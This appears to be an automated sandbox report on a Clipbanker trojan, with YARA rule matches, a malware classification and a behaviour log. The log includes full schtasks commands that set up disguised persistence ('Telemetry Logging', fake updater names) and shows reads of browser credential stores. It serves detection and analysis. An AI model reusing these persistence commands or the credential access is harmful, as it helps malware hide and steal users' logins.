Source: 27.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 7.2.zy4GXi5yvCrsiS0ulH8Z.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 7.2.zy4GXi5yvCrsiS0ulH8Z.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 29.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 29.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001D.00000002.2664724188.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001D.00000002.2664724188.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000007.00000002.2225780219.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000007.00000002.2225780219.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001C.00000002.2581861448.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001C.00000002.2581861448.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000015.00000002.2271675447.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000015.00000002.2271675447.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000E.00000002.4491626286.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000E.00000002.4491626286.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000017.00000002.2280442151.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000017.00000002.2280442151.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000018.00000002.2338388724.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000018.00000002.2338388724.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000016.00000002.2280260250.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000016.00000002.2280260250.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000019.00000002.2418733700.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000019.00000002.2418733700.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001B.00000002.2502350940.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001B.00000002.2502350940.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000009.00000002.2237350330.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000009.00000002.2237350330.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000B.00000002.2241108576.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000B.00000002.2241108576.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@36/36@3/5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA50E6 CreateToolhelp32Snapshot, 0_2_00DA50E6
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqlite
Source: C:\Users\user\Desktop\file.exe Mutant created: \Sessions\1\BaseNamedObjects\slickSlideAnd2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2952:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Mutant created: \Sessions\1\BaseNamedObjects\jW5fQ5e-C7lR7tC1q
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5516:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4072:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\trixyBqgSBuerctg2
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.4491798965.0000000000C52000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.4491798965.0000000000C52000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000003.2098219933.00000000062FA000.00000004.00000020.00020000.00000000.sdmp, _019ogo7XT61Login Data.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe "C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe"
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
